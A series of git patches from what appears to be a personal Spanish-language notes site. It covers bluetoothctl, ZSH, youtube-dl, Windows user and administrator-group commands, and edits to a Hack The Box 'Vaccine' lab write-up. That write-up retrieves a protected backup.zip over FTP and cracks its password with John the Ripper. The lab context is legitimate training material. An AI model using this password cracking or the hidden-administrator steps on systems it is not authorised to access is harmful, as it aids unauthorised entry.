Linux/Linux.md | 4 ++++
1 file changed, 4 insertions(+)
diff --git a/Linux/Linux.md b/Linux/Linux.md
index d0fc409d5ec..b1094be0266 100644
--- a/Linux/Linux.md
+++ b/Linux/Linux.md
@@ -2,6 +2,10 @@
Gran variedad de artículos basdos en el ecosistema Linux.
+## Dispositivos:
+
+[Bluetoothctl](../Linux/Introducción_a_Linux/Bluetoothctl.html)
+
## Programas de Descargas:
### Torrent:
From 5d793623ce812fa3da7606e35b4801cdd1d5dd0b Mon Sep 17 00:00:00 2001
From: F1r0x <103068924+F1r0x@users.noreply.github.com>
Date: Fri, 29 Apr 2022 19:50:22 +0200
Subject: [PATCH 0171/1701] Rename Bluetoothctl to Bluetoothctl.md
---
.../Introducci\303\263n_a_Linux/Bluetoothctl.md" | 0
1 file changed, 0 insertions(+), 0 deletions(-)
rename "Linux/Introducci\303\263n_a_Linux/Bluetoothctl" => "Linux/Introducci\303\263n_a_Linux/Bluetoothctl.md" (100%)
diff --git "a/Linux/Introducci\303\263n_a_Linux/Bluetoothctl" "b/Linux/Introducci\303\263n_a_Linux/Bluetoothctl.md"
similarity index 100%
rename from "Linux/Introducci\303\263n_a_Linux/Bluetoothctl"
rename to "Linux/Introducci\303\263n_a_Linux/Bluetoothctl.md"
From 614f866a04ca6d0dcb7c33ddf6733b46dc53a2ca Mon Sep 17 00:00:00 2001
From: F1r0x <103068924+F1r0x@users.noreply.github.com>
Date: Fri, 29 Apr 2022 19:53:06 +0200
Subject: [PATCH 0172/1701] Update Bluetoothctl.md
---
"Linux/Introducci\303\263n_a_Linux/Bluetoothctl.md" | 10 +++++-----
1 file changed, 5 insertions(+), 5 deletions(-)
diff --git "a/Linux/Introducci\303\263n_a_Linux/Bluetoothctl.md" "b/Linux/Introducci\303\263n_a_Linux/Bluetoothctl.md"
index ace0809db15..b67feccaa2f 100644
--- "a/Linux/Introducci\303\263n_a_Linux/Bluetoothctl.md"
+++ "b/Linux/Introducci\303\263n_a_Linux/Bluetoothctl.md"
@@ -1,6 +1,6 @@
-# Administrados de bluetooth de Linux.
+# Administrador de bluetooth de Linux.
-Para poder abrir el gestor de bluetooth desde la terminal de Linux, utilizaremos el siguiente comando:
+Para poder abrir el gestor de bluetooth desde la terminal de Linux, utilizaremos el siguiente comando:
bluetoothctl
@@ -9,17 +9,17 @@ de bluetoothctl escribir `help`:
bluetoot help
-Para realizar una busqueda de los dispositivos:
+Para realizar una búsqueda de los dispositivos:
scan on
-Para detener la busqueda:
+Para detener la búsqueda:
scan off
Para conectarnos con un dispositivo:
- connect [Núm MAC]
+ connect [Núm. MAC]
El `número MAC` es el número que corresponde con el dispositivo que se nos muestra en el escaneo.
From 462813d797b9ff2ecf266667117481f3d32b3b82 Mon Sep 17 00:00:00 2001
From: F1r0x <103068924+F1r0x@users.noreply.github.com>
Date: Fri, 29 Apr 2022 19:53:26 +0200
Subject: [PATCH 0173/1701] Update Bluetoothctl.md
---
"Linux/Introducci\303\263n_a_Linux/Bluetoothctl.md" | 2 +-
1 file changed, 1 insertion(+), 1 deletion(-)
diff --git "a/Linux/Introducci\303\263n_a_Linux/Bluetoothctl.md" "b/Linux/Introducci\303\263n_a_Linux/Bluetoothctl.md"
index b67feccaa2f..e0d71d95c7d 100644
--- "a/Linux/Introducci\303\263n_a_Linux/Bluetoothctl.md"
+++ "b/Linux/Introducci\303\263n_a_Linux/Bluetoothctl.md"
@@ -1,4 +1,4 @@
-# Administrador de bluetooth de Linux.
+# Administrador Bluetooth de Linux.
Para poder abrir el gestor de bluetooth desde la terminal de Linux, utilizaremos el siguiente comando:
From 8b86d1fc1e4379a5fe3db61721235d99a3c428ce Mon Sep 17 00:00:00 2001
From: F1r0x <103068924+F1r0x@users.noreply.github.com>
Date: Sun, 1 May 2022 01:09:21 +0200
Subject: [PATCH 0174/1701] =?UTF-8?q?Update=20Introducci=C3=B3n=5Fa=5FLinu?=
=?UTF-8?q?x.md?=
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
---
.../Introducci\303\263n_a_Linux.md" | 37 +++++++++++++++++++
1 file changed, 37 insertions(+)
diff --git "a/Linux/Introducci\303\263n_a_Linux/Introducci\303\263n_a_Linux.md" "b/Linux/Introducci\303\263n_a_Linux/Introducci\303\263n_a_Linux.md"
index 8b137891791..241846bfedc 100644
--- "a/Linux/Introducci\303\263n_a_Linux/Introducci\303\263n_a_Linux.md"
+++ "b/Linux/Introducci\303\263n_a_Linux/Introducci\303\263n_a_Linux.md"
@@ -1 +1,38 @@
+# Introducción a Linux
+##¿Qué es Linux?
+
+GNU/Linux es un sistema operativo (o una familia
+de sistemas operativos) tipo Unix compuesto por
+software libre y de código abierto.
+
+GNU/Linux surge de las contribuciones de varios proyectos
+de software, entre los cuales destacan GNU
+(iniciado por Richard Stallman en 1983) y el
+kernel «Linux» (iniciado por Linus Torvalds
+en 1991).
+
+«Linux» es solo el nombre del kernel o
+núcleo, ya que el sistema completo está
+formado también por una gran cantidad de
+componentes del proyecto GNU junto a componentes
+de terceros, que van desde compiladores
+hasta entornos de escritorio.
+
+Cabe señalar que existen derivados que usan el
+núcleo Linux pero que no tienen componentes
+GNU, como por ejemplo el sistema operativo Android.
+También existen distribuciones de software GNU
+donde el núcleo Linux está ausente.
+
+Los sistemas operativos GNU/Linux se encuentran
+normalmente en forma de compendios conocidos como
+distribuciones o distros. Entre las más populares
+se encuentran Debian, Ubuntu, Red Hat y SUSE.
+
+El propósito de estas distribuciones es
+ofrecer GNU/Linux como un producto final para
+instalar o probar en un ordenador, cubriendo
+una gama de necesidades que van desde el uso
+cotidiano personal hasta aplicaciones muy
+específicas en ambientes especializados.
From 50220dfac073b9a061af682e8993234a2e2e46e7 Mon Sep 17 00:00:00 2001
From: F1r0x <103068924+F1r0x@users.noreply.github.com>
Date: Sun, 1 May 2022 01:13:24 +0200
Subject: [PATCH 0175/1701] Update Linux.md
---
Linux/Linux.md | 4 ++++
1 file changed, 4 insertions(+)
diff --git a/Linux/Linux.md b/Linux/Linux.md
index b1094be0266..00216abac7a 100644
--- a/Linux/Linux.md
+++ b/Linux/Linux.md
@@ -2,6 +2,10 @@
Gran variedad de artículos basdos en el ecosistema Linux.
+## Introducción a Linux:
+
+[¿Qué es Linux?](../Linux/Introducción_a_Limux.html)
+
## Dispositivos:
[Bluetoothctl](../Linux/Introducción_a_Linux/Bluetoothctl.html)
From d820a350b13c5f214ce8d388a2c41ac0c517b2f3 Mon Sep 17 00:00:00 2001
From: F1r0x <103068924+F1r0x@users.noreply.github.com>
Date: Sun, 1 May 2022 01:15:04 +0200
Subject: [PATCH 0176/1701] Update Linux.md
---
Linux/Linux.md | 2 +-
1 file changed, 1 insertion(+), 1 deletion(-)
diff --git a/Linux/Linux.md b/Linux/Linux.md
index 00216abac7a..a294fa3d55b 100644
--- a/Linux/Linux.md
+++ b/Linux/Linux.md
@@ -4,7 +4,7 @@ Gran variedad de artículos basdos en el ecosistema Linux.
## Introducción a Linux:
-[¿Qué es Linux?](../Linux/Introducción_a_Limux.html)
+[¿Qué es Linux?](../Linux/Introducción_a_Limux/Introducción_a_Limux.html)
## Dispositivos:
From a7bd09ce8b07c1d54952fc9877fba983afe1c671 Mon Sep 17 00:00:00 2001
From: F1r0x <103068924+F1r0x@users.noreply.github.com>
Date: Sun, 1 May 2022 01:16:09 +0200
Subject: [PATCH 0177/1701] Update Linux.md
---
Linux/Linux.md | 2 +-
1 file changed, 1 insertion(+), 1 deletion(-)
diff --git a/Linux/Linux.md b/Linux/Linux.md
index a294fa3d55b..bd4fc4d577d 100644
--- a/Linux/Linux.md
+++ b/Linux/Linux.md
@@ -4,7 +4,7 @@ Gran variedad de artículos basdos en el ecosistema Linux.
## Introducción a Linux:
-[¿Qué es Linux?](../Linux/Introducción_a_Limux/Introducción_a_Limux.html)
+[¿Qué es Linux?](../Linux/Introducción_a_Linux/Introducción_a_Linux.html)
## Dispositivos:
From 07cbdcf4886661da4138d9e0a176ad77053d4cf4 Mon Sep 17 00:00:00 2001
From: F1r0x <103068924+F1r0x@users.noreply.github.com>
Date: Sun, 1 May 2022 01:18:13 +0200
Subject: [PATCH 0178/1701] =?UTF-8?q?Update=20Introducci=C3=B3n=5Fa=5FLinu?=
=?UTF-8?q?x.md?=
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
---
.../Introducci\303\263n_a_Linux/Introducci\303\263n_a_Linux.md" | 2 +-
1 file changed, 1 insertion(+), 1 deletion(-)
diff --git "a/Linux/Introducci\303\263n_a_Linux/Introducci\303\263n_a_Linux.md" "b/Linux/Introducci\303\263n_a_Linux/Introducci\303\263n_a_Linux.md"
index 241846bfedc..46c869a8d16 100644
--- "a/Linux/Introducci\303\263n_a_Linux/Introducci\303\263n_a_Linux.md"
+++ "b/Linux/Introducci\303\263n_a_Linux/Introducci\303\263n_a_Linux.md"
@@ -1,6 +1,6 @@
# Introducción a Linux
-##¿Qué es Linux?
+## ¿Qué es Linux?
GNU/Linux es un sistema operativo (o una familia
de sistemas operativos) tipo Unix compuesto por
From 24ae73ccd8193e9b1d06e179947872c411af8b12 Mon Sep 17 00:00:00 2001
From: F1r0x <103068924+F1r0x@users.noreply.github.com>
Date: Sun, 1 May 2022 13:51:59 +0200
Subject: [PATCH 0179/1701] Update Bluetoothctl.md
---
.../Bluetoothctl.md" | 18 ++++++++++++++++++
1 file changed, 18 insertions(+)
diff --git "a/Linux/Introducci\303\263n_a_Linux/Bluetoothctl.md" "b/Linux/Introducci\303\263n_a_Linux/Bluetoothctl.md"
index e0d71d95c7d..600621b87e3 100644
--- "a/Linux/Introducci\303\263n_a_Linux/Bluetoothctl.md"
+++ "b/Linux/Introducci\303\263n_a_Linux/Bluetoothctl.md"
@@ -1,18 +1,36 @@
+
+
# Administrador Bluetooth de Linux.
Para poder abrir el gestor de bluetooth desde la terminal de Linux, utilizaremos el siguiente comando:
bluetoothctl
+
+
+
+
Para ver todos los comandos disponibles podemos ejecutar el siguiente comando o una vez dentro de la shell
de bluetoothctl escribir `help`:
bluetoot help
+
+
+
+
+
+Para poder ver las epecificaciones de nuestro administrador Bluetooth:
+
+ show
+ 
+
Para realizar una búsqueda de los dispositivos:
scan on
+
+
Para detener la búsqueda:
scan off
From bbe94531049a05cc48e8af9aabb2ce7cd85fa73d Mon Sep 17 00:00:00 2001
From: F1r0x <103068924+F1r0x@users.noreply.github.com>
Date: Sun, 1 May 2022 13:57:57 +0200
Subject: [PATCH 0180/1701] Update ZSH.md
---
"Linux/Introducci\303\263n_a_Linux/ZSH.md" | 6 ++++--
1 file changed, 4 insertions(+), 2 deletions(-)
diff --git "a/Linux/Introducci\303\263n_a_Linux/ZSH.md" "b/Linux/Introducci\303\263n_a_Linux/ZSH.md"
index ee71432ae29..203865e252b 100644
--- "a/Linux/Introducci\303\263n_a_Linux/ZSH.md"
+++ "b/Linux/Introducci\303\263n_a_Linux/ZSH.md"
@@ -1,4 +1,6 @@
-# ZSH
+
+
+# ¿Qué es ZSH?
ZSH es un poderoso interprete de comandos para sistemas Unix. Construido sobre el popular shell bash. Es, gratuito, de código abierto y se
actualiza periodicamente.
@@ -24,7 +26,7 @@ Luego iniciamos la instalación:
Para ejecutar ZSH de forma automatica cada vez que iniciemos sesión y establecerla podemos hacerlo de dos maneras.
La primera es ejecutando el siguiente comando:
- chsh -s $(wich zsh)
+ sudo chsh -s $(wich zsh)
Una vez hecho esto, reiniciamos el sistema y comprobamos que funcione. En caso de no funcionar, tendremos que hacerlo de forma manual.
Para ello abrimos el archivo `.bashrc` con el siguiente comando:
From c968f312684f7be97cacde321ad0f6bfdabd590a Mon Sep 17 00:00:00 2001
From: F1r0x <103068924+F1r0x@users.noreply.github.com>
Date: Mon, 2 May 2022 08:42:40 +0200
Subject: [PATCH 0181/1701] Create Administrar_Usuarios_y_Permisos
---
Windows/Administrar_Usuarios_y_Permisos | 69 +++++++++++++++++++++++++
1 file changed, 69 insertions(+)
create mode 100644 Windows/Administrar_Usuarios_y_Permisos
diff --git a/Windows/Administrar_Usuarios_y_Permisos b/Windows/Administrar_Usuarios_y_Permisos
new file mode 100644
index 00000000000..3f37b2b7711
--- /dev/null
+++ b/Windows/Administrar_Usuarios_y_Permisos
@@ -0,0 +1,69 @@
+# Administrar Usuarios y Permisos Windows
+
+En este artículo se muestra como crear o eliminar usuarios y administrar permisos de usuarios desde la shell de Windows.
+
+## Abrir la Terminal:
+
+Para abrir la terminal en Windows podemos escribir en el buscador `cmd` o presionar `Tecla Windows + R` y luego escribimos `cmd` o `símbolo del sistema`.
+Lo ideal para no tener problemas, es abrir la Terminal como Administrador, para ello la buscamos mediante el buscador y escribimos `cmd`, luego presionamos
+clic Derecho y `Abrir como Administrador`.
+
+## Listar Usuarios:
+Mediante este comando podremos ver todos los usuarios registrados en el sistema:
+
+ net user
+
+## Crear un Nuevo Usuario:
+Para crear un Usuario Nuevo sin permisos de Administrador podemos utilizar los siguientes comandos. Debemos tener en cuenta que el Usuario creado no
+tendrá contraseña y que tenemos que definirla nosotros una vez creado.
+
+ net user 'nombre de usuario' /add
+
+Otro comando para crear un Usuario es el siguiente:
+
+ adduser 'nombre de usuario'
+
+## Establecer Contraseña a un Usuario:
+
+Una vez tenemos el Usuario creado, vamos a establecer una contraseña. Para ello introducimos el siguiente comando y se nos desplegará en la terminal la
+opción de introducir una contraseña.
+
+ net user 'nombre usuario' *
+
+En caso de querer eliminar la contraseña, simplemente usamos el mismo comando, pero en este caso en vez de introducir una contraseña nueva, solo
+pulsamos dos veces `Enter` dejando los parámetros en blanco.
+
+## Ver Permisos:
+Mediante el siguiente comando podremos ver que tipo de permisos le podemos dar a cada usuario. La lista que muesta el siguiente comando, muestra todos
+los permisos.
+
+ net localgroup
+
+## Dar Permisos a un Usuario:
+Para poder dar permisos a un Usuario, como por ejemplo como `Administrador`, realizamos lo siguiente:
+
+ net localgroup administrador 'nombre de usuario' /add
+
+ En caso de desear otro tipo de permiso, simplemente cambiamos `administrador` por el permiso que le queramos dar.
+
+ ## Eliminar Permisos a un Usuario:
+ La sintaxis es casi igual que para dar permisos, solo cambiamos la variable final por `/delete`:
+
+ net localgroup administrador 'nombre de usuario' /delete
+
+ ## Eliminar Usuarios:
+
+ net user 'nombre de usuario' /delete
+
+ ## Habilitar cuenta de Administrador Oculta:
+ Este comando activa o habilita la cuenta de administrador oculta del sistema Windows. Esto se utiliza normalmente cuando no tenemos permisos de
+ administrador, y por tanto, no podemos realizar cambios:
+
+ net user administrador /active:yes
+
+Para comprobar que estamos utilizando el nombre correcto del permiso (en este caso `administrador`), podemos revisarlo mediante el comando mencionado
+anteriormente `net localgroup`.
+
+Para desactivar la cuenta de administrador oculta:
+
+ net user administrador /active:no
From c22673671bc3767879d0191af9e5e5dc1c40d07c Mon Sep 17 00:00:00 2001
From: F1r0x <103068924+F1r0x@users.noreply.github.com>
Date: Mon, 2 May 2022 08:45:22 +0200
Subject: [PATCH 0182/1701] Create Windows.md
---
Windows/Windows.md | 3 +++
1 file changed, 3 insertions(+)
create mode 100644 Windows/Windows.md
diff --git a/Windows/Windows.md b/Windows/Windows.md
new file mode 100644
index 00000000000..53c3665aad7
--- /dev/null
+++ b/Windows/Windows.md
@@ -0,0 +1,3 @@
+# Terminal de Windows
+
+[Administrar Usuarios y Permisos](../Windows/Administrar_Usuarios_y_Permisos.html)
From 21898c4cf6ebee330b8ba636db9f78e0a1298a89 Mon Sep 17 00:00:00 2001
From: F1r0x <103068924+F1r0x@users.noreply.github.com>
Date: Mon, 2 May 2022 08:45:39 +0200
Subject: [PATCH 0183/1701] Rename Administrar_Usuarios_y_Permisos to
Administrar_Usuarios_y_Permisos.md
---
...rar_Usuarios_y_Permisos => Administrar_Usuarios_y_Permisos.md} | 0
1 file changed, 0 insertions(+), 0 deletions(-)
rename Windows/{Administrar_Usuarios_y_Permisos => Administrar_Usuarios_y_Permisos.md} (100%)
diff --git a/Windows/Administrar_Usuarios_y_Permisos b/Windows/Administrar_Usuarios_y_Permisos.md
similarity index 100%
rename from Windows/Administrar_Usuarios_y_Permisos
rename to Windows/Administrar_Usuarios_y_Permisos.md
From de19ce79ea77949c72acfe1b37b02f73b044fa08 Mon Sep 17 00:00:00 2001
From: F1r0x <103068924+F1r0x@users.noreply.github.com>
Date: Mon, 2 May 2022 08:47:00 +0200
Subject: [PATCH 0184/1701] Update index.md
---
index.md | 2 ++
1 file changed, 2 insertions(+)
diff --git a/index.md b/index.md
index f1c9902b0a8..e0af81c46f0 100644
--- a/index.md
+++ b/index.md
@@ -13,6 +13,8 @@
[Linux](./Linux/Linux.html)
+[Windows](./Windows/Windows.html)
+
[Fase de Reconocimiento - HTB](./Artículos/Fase_de_reconocimiento-HTB.html)
[¿Como conectarse a Htb?](./Artículos/Como_conectarse_a_HTB.html)
From 0230b578ee1e65f4836b10e56b650af8892ff301 Mon Sep 17 00:00:00 2001
From: F1r0x <103068924+F1r0x@users.noreply.github.com>
Date: Mon, 2 May 2022 08:52:14 +0200
Subject: [PATCH 0185/1701] =?UTF-8?q?Create=20Art=C3=ADculos-HTB.md?=
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
---
"Art\303\255culos/Art\303\255culos-HTB.md" | 5 +++++
1 file changed, 5 insertions(+)
create mode 100644 "Art\303\255culos/Art\303\255culos-HTB.md"
diff --git "a/Art\303\255culos/Art\303\255culos-HTB.md" "b/Art\303\255culos/Art\303\255culos-HTB.md"
new file mode 100644
index 00000000000..db437118b97
--- /dev/null
+++ "b/Art\303\255culos/Art\303\255culos-HTB.md"
@@ -0,0 +1,5 @@
+# Artículos sobre Hack The Box
+
+[Fase de Reconocimiento - HTB](../Artículos/Fase_de_reconocimiento-HTB.html)
+
+[¿Como conectarse a Htb?](../Artículos/Como_conectarse_a_HTB.html)
From f220401b9751859eec435b31701debd63d71f47d Mon Sep 17 00:00:00 2001
From: F1r0x <103068924+F1r0x@users.noreply.github.com>
Date: Mon, 2 May 2022 08:53:13 +0200
Subject: [PATCH 0186/1701] Update index.md
---
index.md | 4 +---
1 file changed, 1 insertion(+), 3 deletions(-)
diff --git a/index.md b/index.md
index e0af81c46f0..3d3fd490c15 100644
--- a/index.md
+++ b/index.md
@@ -15,9 +15,7 @@
[Windows](./Windows/Windows.html)
-[Fase de Reconocimiento - HTB](./Artículos/Fase_de_reconocimiento-HTB.html)
-
-[¿Como conectarse a Htb?](./Artículos/Como_conectarse_a_HTB.html)
+[Hack The Box](./Artículos/Artículos-HTB.html)
---
From 9fe699b0215206916f7e1ccda69ce6067a2cb125 Mon Sep 17 00:00:00 2001
From: F1r0x <103068924+F1r0x@users.noreply.github.com>
Date: Mon, 2 May 2022 09:09:01 +0200
Subject: [PATCH 0187/1701] Update Linux.md
---
Linux/Linux.md | 18 +++++++++++++-----
1 file changed, 13 insertions(+), 5 deletions(-)
diff --git a/Linux/Linux.md b/Linux/Linux.md
index bd4fc4d577d..6911468ad7f 100644
--- a/Linux/Linux.md
+++ b/Linux/Linux.md
@@ -1,20 +1,28 @@

-Gran variedad de artículos basdos en el ecosistema Linux.
+Aquí podéis encontrar gran variedad de artículos basados en el ecosistema Linux. Se muestra tanta información básica de Linux, instalación y ejecución
+de dispositivos, gestores y administradores de terminales, etc. En mi caso estoy utilizando ParrotOS que es un sistema operativo basado en Debian.
-## Introducción a Linux:
+# Introducción a Linux:
[¿Qué es Linux?](../Linux/Introducción_a_Linux/Introducción_a_Linux.html)
-## Dispositivos:
+# Dispositivos:
[Bluetoothctl](../Linux/Introducción_a_Linux/Bluetoothctl.html)
-## Programas de Descargas:
+# Programas de Descargas:
+Estos son distintos programas de Descarga de archivos para diferentes plataformas y archivos.
+
### Torrent:
+Para descargar archivos Torrent desde la terminal.
[Aria2](../Linux/Programas_para_Linux/Aria2.html)
-## Gestor de Comandos:
+### Youtube:
+
+[Youtube-dl](../Linux/Programas_para_Linux/Youtube-dl.html)
+
+# Gestor de Comandos:
[ZSH](../Linux/Introducción_a_Linux/ZSH.html)
From e0fcddcff38f063d573f29b68e045a21e39a3b66 Mon Sep 17 00:00:00 2001
From: F1r0x <103068924+F1r0x@users.noreply.github.com>
Date: Mon, 2 May 2022 09:11:20 +0200
Subject: [PATCH 0188/1701] Update Linux.md
---
Linux/Linux.md | 7 ++++---
1 file changed, 4 insertions(+), 3 deletions(-)
diff --git a/Linux/Linux.md b/Linux/Linux.md
index 6911468ad7f..8d2cc8b3a9b 100644
--- a/Linux/Linux.md
+++ b/Linux/Linux.md
@@ -14,12 +14,13 @@ de dispositivos, gestores y administradores de terminales, etc. En mi caso estoy
# Programas de Descargas:
Estos son distintos programas de Descarga de archivos para diferentes plataformas y archivos.
-### Torrent:
-Para descargar archivos Torrent desde la terminal.
+### Torrent
+Para descargar archivos Torrent desde la Terminal.
[Aria2](../Linux/Programas_para_Linux/Aria2.html)
-### Youtube:
+### Youtube
+Para descargar tanto vídeos como audio de Youtube desde la Terminal.
[Youtube-dl](../Linux/Programas_para_Linux/Youtube-dl.html)
From 74937c6ebad872314da07a91be5aea55c5017163 Mon Sep 17 00:00:00 2001
From: F1r0x <103068924+F1r0x@users.noreply.github.com>
Date: Mon, 2 May 2022 09:22:41 +0200
Subject: [PATCH 0189/1701] Create Youtube-dl.md
---
Linux/Programas_para_Linux/Youtube-dl.md | 21 +++++++++++++++++++++
1 file changed, 21 insertions(+)
create mode 100644 Linux/Programas_para_Linux/Youtube-dl.md
diff --git a/Linux/Programas_para_Linux/Youtube-dl.md b/Linux/Programas_para_Linux/Youtube-dl.md
new file mode 100644
index 00000000000..e80f44a1928
--- /dev/null
+++ b/Linux/Programas_para_Linux/Youtube-dl.md
@@ -0,0 +1,21 @@
+# Descargar contenido de YouTube desde la Terminal
+
+Para poder Descargar tanto los videos como el audio directamente desde YouTube a la Terminal, utilizaremos la herramienta `youtube-dl`. Para poder
+usarla primero tendremos que descargarla. En mi caso utilizo ParrotOS, por tanto, estos comandos solo valdrán para sistemas operativos basados en
+Debian.
+
+# Instalación:
+
+ sudo apt-get install youtube-dl
+
+# Ejecución:
+Para descargar los archivos copiamos la URL de los videos que queramos de YouTube y ejecutamos los siguientes comandos. Los archivos se descargarán en
+el directorio en el que nos encontremos.
+
+### Descargar Video:
+
+ youtube-dl 'URL del Video'
+
+### Descargar solo Audio:
+
+ youtube-dl -x --audio-format mp3 'URL del Video'
From a559f9180ab118654838359a620c7efb73ea2e6a Mon Sep 17 00:00:00 2001
From: F1r0x <103068924+F1r0x@users.noreply.github.com>
Date: Mon, 2 May 2022 09:40:33 +0200
Subject: [PATCH 0190/1701] Update Youtube-dl.md
---
Linux/Programas_para_Linux/Youtube-dl.md | 16 ++++++++++++++++
1 file changed, 16 insertions(+)
diff --git a/Linux/Programas_para_Linux/Youtube-dl.md b/Linux/Programas_para_Linux/Youtube-dl.md
index e80f44a1928..3a46a598062 100644
--- a/Linux/Programas_para_Linux/Youtube-dl.md
+++ b/Linux/Programas_para_Linux/Youtube-dl.md
@@ -8,6 +8,8 @@ Debian.
sudo apt-get install youtube-dl
+
+
# Ejecución:
Para descargar los archivos copiamos la URL de los videos que queramos de YouTube y ejecutamos los siguientes comandos. Los archivos se descargarán en
el directorio en el que nos encontremos.
@@ -16,6 +18,20 @@ el directorio en el que nos encontremos.
youtube-dl 'URL del Video'
+
+
+
+
### Descargar solo Audio:
youtube-dl -x --audio-format mp3 'URL del Video'
+
+`-x` : Convierte los archivos en archivos solo de audio.
+
+`--audio-format` : Para poder especificar el formato de audio en el que descargaremos el archivo.
+
+`mp3` : Formato en el que se descargará el archivo.
+
+
+
+
From f6ff9ce84b0c1991ac82f50968a8b4fba3f41522 Mon Sep 17 00:00:00 2001
From: F1r0x <103068924+F1r0x@users.noreply.github.com>
Date: Mon, 2 May 2022 09:42:42 +0200
Subject: [PATCH 0191/1701] Update Youtube-dl.md
---
Linux/Programas_para_Linux/Youtube-dl.md | 2 ++
1 file changed, 2 insertions(+)
diff --git a/Linux/Programas_para_Linux/Youtube-dl.md b/Linux/Programas_para_Linux/Youtube-dl.md
index 3a46a598062..72b850910c4 100644
--- a/Linux/Programas_para_Linux/Youtube-dl.md
+++ b/Linux/Programas_para_Linux/Youtube-dl.md
@@ -35,3 +35,5 @@ el directorio en el que nos encontremos.


+
+Mediante Youtube-dl podemos descargar archivos de audio en los formatos: `acc`, `vorbis`, `mp3`, `m4a`, `opus` y `wav`.
From dffb8b4b34eb1becca7efd4fa538f2c63e83c93a Mon Sep 17 00:00:00 2001
From: F1r0x <103068924+F1r0x@users.noreply.github.com>
Date: Mon, 2 May 2022 09:49:06 +0200
Subject: [PATCH 0192/1701] Update HTB-Vaccine.md
---
Starting Point/HTB-Vaccine.md | 2 +-
1 file changed, 1 insertion(+), 1 deletion(-)
diff --git a/Starting Point/HTB-Vaccine.md b/Starting Point/HTB-Vaccine.md
index 1b32a5a88c2..1b74c30d3ec 100644
--- a/Starting Point/HTB-Vaccine.md
+++ b/Starting Point/HTB-Vaccine.md
@@ -76,7 +76,7 @@ Aquí podemos ver que tenemos un servicio ssh activo, usando un sistema Ubuntu.
- Puerto 80/tcp:
-El puerto 80 tiene un servicio http activo, el cual, si nos dirigimos a firefox, podemos ver que nos reporta
+El puerto 80 tiene un servicio http activo, el cual, si nos dirigimos a firefox, podemos ver que nos redirige
hasta una página de registro:

From 13def9fa3b893e459059d8d586d488a59bf52c2f Mon Sep 17 00:00:00 2001
From: F1r0x <103068924+F1r0x@users.noreply.github.com>
Date: Mon, 2 May 2022 09:52:21 +0200
Subject: [PATCH 0193/1701] Update HTB-Vaccine.md
---
Starting Point/HTB-Vaccine.md | 6 +++---
1 file changed, 3 insertions(+), 3 deletions(-)
diff --git a/Starting Point/HTB-Vaccine.md b/Starting Point/HTB-Vaccine.md
index 1b74c30d3ec..ec5dfe51235 100644
--- a/Starting Point/HTB-Vaccine.md
+++ b/Starting Point/HTB-Vaccine.md
@@ -99,14 +99,14 @@ Ahora, mediante un `ls` o un `dir`, vamos a tratar de ver que archivos encontram

-En mi caso no me permite ejecutar ninguno de los dos comandos. Pero como podemos ver nos reporta que consideremos
-utilizar PASV. Para ello, debemos activar el modo pasivo:
+En mi caso no me permite ejecutar ninguno de los dos comandos. Pero como podemos ver, nos reporta que consideremos
+utilizar PASV. Para ello, debemos activar el modo `passive`:
passive

-Tras activar el modo activo ya podremos utilizar el comando `ls`:
+Tras activar el modo `passive` ya podremos utilizar el comando `ls`:

From f382e6bec0e061ce197a9bfe40b91d09ce0e970f Mon Sep 17 00:00:00 2001
From: F1r0x <103068924+F1r0x@users.noreply.github.com>
Date: Mon, 2 May 2022 09:55:27 +0200
Subject: [PATCH 0194/1701] Update HTB-Vaccine.md
---
Starting Point/HTB-Vaccine.md | 6 +++---
1 file changed, 3 insertions(+), 3 deletions(-)
diff --git a/Starting Point/HTB-Vaccine.md b/Starting Point/HTB-Vaccine.md
index ec5dfe51235..365f60484f1 100644
--- a/Starting Point/HTB-Vaccine.md
+++ b/Starting Point/HTB-Vaccine.md
@@ -125,20 +125,20 @@ Tener en cuenta que la shell está es muy inestable, en caso de error o de repor
con el comando `exit` y volver a iniciar la shell siguiendo todos los pasos de manera continua, ya que a los pocos
minutos, se desconecta.
-Una vez descargado el archivo.zip, cerramos la shell ftp y nos derigimos al directorio donde hemos descargado el
+Una vez descargado el archivo.zip, cerramos la shell ftp y nos dirigimos al directorio donde hemos descargado el
arhcivo `backup.zip`.

Como podeís ver, tenemos los dos archivos previamente creados con nmap (allPorts y target) y nuestro archivo .zip.
-Vamos a crear un directorio mediante 'mkdir' llamado `Backup`y vamos a introducir el archivo .zip para luego tratar
+Vamos a crear un directorio mediante `mkdir` llamado `Backup` y vamos a introducir el archivo .zip para luego tratar
de descomprimirlo.
mkdir Backup
mv backup.zip ./Backup/
-Una vez dentro del nuevo directorio, aplicaremos el comando `nzip`para tratar de descomprimirlo:
+Una vez dentro del nuevo directorio, aplicaremos el comando `unzip` para tratar de descomprimirlo:
unzip backup.zip
From f0aa112964a9a724a8a9159571029cc208cb6fd4 Mon Sep 17 00:00:00 2001
From: F1r0x <103068924+F1r0x@users.noreply.github.com>
Date: Mon, 2 May 2022 09:57:44 +0200
Subject: [PATCH 0195/1701] Update HTB-Vaccine.md
---
Starting Point/HTB-Vaccine.md | 4 +---
1 file changed, 1 insertion(+), 3 deletions(-)
diff --git a/Starting Point/HTB-Vaccine.md b/Starting Point/HTB-Vaccine.md
index 365f60484f1..0d79961c6ac 100644
--- a/Starting Point/HTB-Vaccine.md
+++ b/Starting Point/HTB-Vaccine.md
@@ -151,9 +151,7 @@ podemos ver como nos reporta que dentro del .zip contiene dos archivos (index.ph

Como desconocemos la contraseña, vamos a utilizar la herramienta John the Ripper para tratar de descifrarla. En
-caso de no tener la herramienta instalada o queráis leer más sobre ella podréis encontrarlo en el siguiente enlace:
-
-[John the Ripper](../Herramientas_y_Scripts/john_the_ripper.html)
+caso de no tener la herramienta instalada o queráis leer más sobre ella podréis encontrarlo en el siguiente enlace: [John the Ripper](../Herramientas_y_Scripts/john_the_ripper.html)
### John the Ripper:
From ecb14f10bb5ef1b35f8855f4dd416846709e2e88 Mon Sep 17 00:00:00 2001
From: F1r0x <103068924+F1r0x@users.noreply.github.com>
Date: Wed, 4 May 2022 09:34:11 +0200
Subject: [PATCH 0196/1701] Create FFUF.md
---
Herramientas_y_Scripts/FFUF.md | 3 +++
1 file changed, 3 insertions(+)
create mode 100644 Herramientas_y_Scripts/FFUF.md
diff --git a/Herramientas_y_Scripts/FFUF.md b/Herramientas_y_Scripts/FFUF.md
new file mode 100644
index 00000000000..ea760e35254
